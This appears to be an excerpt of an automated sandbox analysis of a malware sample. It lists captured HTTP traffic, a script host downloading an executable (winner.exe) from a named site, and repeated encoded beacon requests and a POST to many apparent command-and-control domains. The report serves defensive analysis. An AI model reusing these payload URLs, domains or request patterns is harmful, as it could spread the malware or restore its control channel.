91 ec fc 06 1e dd 8c b0 b5 bf 17 65 de 61 f8 d1 13 95 83 57 a9 60 15 1c aa 1a 23 8b f2 3f 34 d8 a1 05 d6 0a b7 a0 34 53 d7 6f d1 8e 06 e6 d9 9c 3c ca 3a 11 13 dc 1e d2 86 ca 9a 2c a7 fe c7 56 5b d2 4d cb 9b d7 ab 55 2a bf c8 db f5 94 71 44 ef 31 58 6d 9b 3f 94 6e d7 e5 e2 56 1b dc a2 85 2d 75 15 1a 0d 5b 4a e3 19 26 91 69 ab e8 7e e9 5b ff 40 72 49 3e a5 62 72 7e 1c c0 2f 0d 9f 1a 0b f3 28 e4 9d e9 b5 7a 56 c9 60 fa 66 75 62 ed e6 e8 73 e5 Data Ascii: 2d7SMo8WLY`O-p%Av{hR4-=D"Yrd'M{yfqWrgE^`6 +*9k6TY+v}gCd1^Ht[=ie~zWsy:+Cjg,UAGspzzjhdPq&bGi{x"H}>a!3UP=kgs8u=tCB{+_=Uh YV>-OuYG{:QCBzG)!
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:42:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7%2BsKB3TdwtpE%2FkxJI0cv7MJgObb8a3UJf4PnZaGfmHBpE61FYhi6JD%2FJhhbo%2Fu%2FXC7tZwRPM8r6K8BmXzULATwGj3qTqGV2XHL2b46jrFl%2FnGDeV17bC8DEBCvP%2BYyK595T3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 791a4963a82e71ed-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 36 34 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 4d 65 74 61 20 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 31 32 30 30 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 31 32 30 30 22 3e 20 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 43 53 53 20 47 6c 6f 62 61 6c 20 43 6f 6d 70 75 6c 73 6f 72 79 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 77 65 62 2e 6d 69 6e 2e 63 73 73 22 3e 0a 20 20 20 20 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 77 65 62 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 Data Ascii: 649<!DOCTYPE html><html lang="en"><head> <title>404 PAGE NOT FOUND</title> <!-- Meta --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta content="width=1200, initial-scale=1" name="viewport"> <!-- <meta content="viewport" content="width=1200"> --> <meta content="" name="description">
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 30 Jan 2023 12:42:23 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f cd 4e c3 30 10 84 ef 79 8a a5 27 38 e0 4d ab 20 71 b0 2c d1 26 15 95 42 89 c0 39 f4 e8 e2 2d 8e 54 e2 e0 1f 02 6f 8f 93 0a 89 cb 4a b3 fb cd 6a 86 5f 95 cf 1b 79 68 2a 78 94 4f 35 34 ed ba de 6d 60 71 8b b8 ab e4 16 b1 94 e5 e5 b2 62 39 62 b5 5f 88 8c 9b f0 71 16 dc 90 d2 49 84 2e 9c 49 14 79 01 7b 1b 60 6b 63 af 39 5e 96 19 c7 19 e2 47 ab 7f 26 df 52 fc 63 92 ca f8 20 a4 21 70 f4 19 c9 07 d2 d0 be d4 30 2a 0f 7d e2 4e 13 07 b6 87 60 3a 0f 9e dc 17 39 c6 71 98 3e b9 34 94 d6 8e bc 17 0f 83 7a 33 84 2b 56 b0 bb 25 5c b7 7d f7 7d 03 af 33 0e 2a c0 38 8e cc d8 f8 6e 23 73 11 1a eb 02 dc e7 1c ff dc 29 e4 1c 2f 05 9a 6a 65 bf 61 a5 f1 01 11 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e6MN0y'8M q,&B9-ToJj_yh*xO54m`qb9b_qI.Iy{`kc9^G&Rc !p0*}N`:9q>4z3+V%\}}3*8n#s)/jea0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 30 Jan 2023 12:42:25 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 273Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 31 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 68 6f 75 67 6f 75 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.51 (Unix) Server at www.hougou.ru Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 30 Jan 2023 12:42:32 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.44yyds.com
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.44yyds.com/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arritalvigo.com
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arritalvigo.com/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arritalvigo.comwww.arritalvigo.com20=4xfPiv3RnE
          Source: explorer.exe, 00000003.00000000.417335340.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.827550131.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.chimid.org
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.chimid.org/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.deglaz.xyz
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.deglaz.xyz/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.deglaz.xyzwww.deglaz.xyz20=4xfPiv3RnEaY
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dellaone.com
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dellaone.com/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.frogair.online
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.frogair.online/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.genuineinsights.cloud
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.genuineinsights.cloud/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.genuineinsights.cloudwww.genuineinsights.cloud20=4xfPiv3RnE
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hayethe.site
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hayethe.site/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hayethe.sitewww.hayethe.site20=4xfPiv3RnE
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hougou.ru
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hougou.ru/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hougou.ru/czni/ev
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hougou.ruwww.hougou.ru20=4xfPiv3RnE
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lakeviewautomation.com
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lakeviewautomation.com/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lakeviewautomation.comwww.lakeviewautomation.com20=4xfPiv3RnE
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.laylaroseuk.com
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.laylaroseuk.com/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.octohoki.net
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.octohoki.net/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.panalobet88.net
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.panalobet88.net/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.toporsche.online
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.toporsche.online/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.toporsche.onlinewww.toporsche.online20=4xfPiv3RnE
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.versusfinances.tech
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.versusfinances.tech/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeah-go.com
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeah-go.com/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeah-go.comwww.yeah-go.com20=4xfPiv3RnE
          Source: wscript.exe, 00000000.00000003.304596761.000001B34911D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hirosguide.hu/ti/winner.exe
          Source: unknownHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.toporsche.onlineConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.toporsche.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.toporsche.online/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 4a 36 6d 77 72 74 4a 74 65 61 62 54 6c 53 30 52 34 73 49 45 37 78 6d 69 6d 35 6d 6c 4a 41 7e 4e 56 75 70 7a 34 75 71 62 34 73 54 4c 54 42 43 56 46 71 4e 45 74 4f 4d 49 64 43 7e 6e 74 77 47 79 48 5a 79 63 6c 58 54 77 56 54 67 61 78 64 79 43 45 4e 54 71 56 6a 75 79 38 6a 39 46 53 71 31 65 6c 76 53 74 72 66 41 78 62 63 57 36 39 53 39 70 71 36 69 43 30 53 72 66 6d 76 46 72 7a 61 78 55 4f 31 54 70 51 4b 57 4d 76 61 62 6a 6d 58 7a 43 6f 30 65 62 44 41 78 69 6a 75 52 64 45 2d 68 50 65 70 6b 49 31 79 61 35 36 41 6f 51 31 4f 48 4f 61 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=J6mwrtJteabTlS0R4sIE7xmim5mlJA~NVupz4uqb4sTLTBCVFqNEtOMIdC~ntwGyHZyclXTwVTgaxdyCENTqVjuy8j9FSq1elvStrfAxbcW69S9pq6iC0SrfmvFrzaxUO1TpQKWMvabjmXzCo0ebDAxijuRdE-hPepkI1ya56AoQ1OHOaA).
          Source: unknownDNS traffic detected: queries for: hirosguide.hu
          Source: global trafficHTTP traffic detected: GET /ti/winner.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: hirosguide.huConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=fBMxo69x1QXNWuc9hyM7d4IFsS8MYdi4DQWD1kEEyFhAPfH6LtWDKNH9q/ewbXUtBA348B3g5uC8JLGqihwz/XjbfKo4x0QdAA== HTTP/1.1Host: www.panalobet88.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=E4OQobxTIZHI9DwF67UlwwaqlZHGKxy7UPoiurSE2O3aUzyIC/5i48ZUEimfrB3iPtHclG/TUXxg+aW3JsqIZG+/wkw9ZppI6Q==&20=4xfPiv3RnE HTTP/1.1Host: www.toporsche.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=q4vOuZlu2gw387VDV10PDpiWTFl2xG2mj37j5EK3EACa1yxM1cLCbJZ7QUgC2jLM/Tg8TnJqujzMrtpKg/UGeVYytsfF/XPvWg== HTTP/1.1Host: www.chimid.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=06gIUCFIBOa1TNKOgihx1QaHEyCsoo2zVarqfXE1BGhN6bynIxp2kNvfG92v3asKvvgl0gKrl2tBRyImUhoMMpO0yMdYVRtJxA==&20=4xfPiv3RnE HTTP/1.1Host: www.genuineinsights.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=DD3LLnJbgjRI3wbnkxRSCI8A3gaHykSHoexTe78K7+O1bJpnCKZS4RFcfu7PoQdaWmtTlOOE5dVeManAz6l5Ezu0dt1GwRw+Ew== HTTP/1.1Host: www.44yyds.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=NBbLbMKCnleo0bnLNJr7y57f08wHeLbsflpVfs6UmX5SvZLxN88Gw8EeREzrIsvGXit/2Ohq43fDpUBAiFCfWP8z8U1D0vMs/Q==&20=4xfPiv3RnE HTTP/1.1Host: www.yeah-go.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=5oRHUQDtYJ3jH+KiyYuXif0R6NF655imjfvnRa6lV5c+zSwVFD4ch3jkTam3ow4RLLhVoDNP5tCGnm9XMNb3kyjT9rM2PcJgOg== HTTP/1.1Host: www.frogair.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=y4naTkG6lumfG07sOssNMJlhuzOAznpWNSZYkPg2bq4ikF6oslohHoKN6Rf87KyLhWahQVt7sEYulG9jlpJKSoDlIP2gQN5V1A==&20=4xfPiv3RnE HTTP/1.1Host: www.deglaz.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=CEJ5RAslKFrvYswGKkWFaMEg5PbGdI0uMfwhN2QDDZMYEZrXiZBgo1mjS41e+07AKrnAHTFcuEyQDmPBY1Lnrpc7hFsEfyPzNg== HTTP/1.1Host: www.laylaroseuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=Pl1f6CcPgRBbBLamGgJlBKsDaKeibUUROb0ghzsubaIK3xnCplVa9FjztovwbGNPlK34MFgEpzS+BZjpXc1RGWmrSHwVxpGmpQ==&20=4xfPiv3RnE HTTP/1.1Host: www.lakeviewautomation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=pjpdKCpJnNXPdeWbwYyFkbOLSaKVTVa2roCT8abPBwtlkFjZcqcvSY6Wc82/f3EmpMB4AQ+PhDNFqdOW9DbfejlZOApCjfoJ4Q== HTTP/1.1Host: www.dellaone.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=7CuzI5hL2DbaheDUreUXt/0ggIp8KK0y2ydS3GGUn+rOJNFozWHMconX3zZMJG7nrNLowVQEJNRqJBBdS7PrQOxc+aMUIwOUOQ==&20=4xfPiv3RnE HTTP/1.1Host: www.arritalvigo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=jZ3aVVsOPCQ8zDolwfPMJ0FgyASOdlT+pUUZWGluxzeJivrfCzX4+7jeTlPikh1G7PP+5G6V9EQpGQT3uHsK4bLie7FdC0b4pw== HTTP/1.1Host: www.versusfinances.techConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=XafM9ufeulvUyazB3PczebMntNGhHBxQYaw7zhnKr1/uYxmt3ImqmxlzRjnKksyV1dU+VPei5c3Iajrs/dC16sOcVh74K2vF1w==&20=4xfPiv3RnE HTTP/1.1Host: www.hayethe.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=4iC+VHkN7UzSdUovnFh7HjvkVuvE2o78vWsfJQRZ88kc+lrgrCCJnpqL68g1VIZYfy6U/dRc4iar4OlCjHSLY4rOm4VqYu/FMA== HTTP/1.1Host: www.octohoki.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
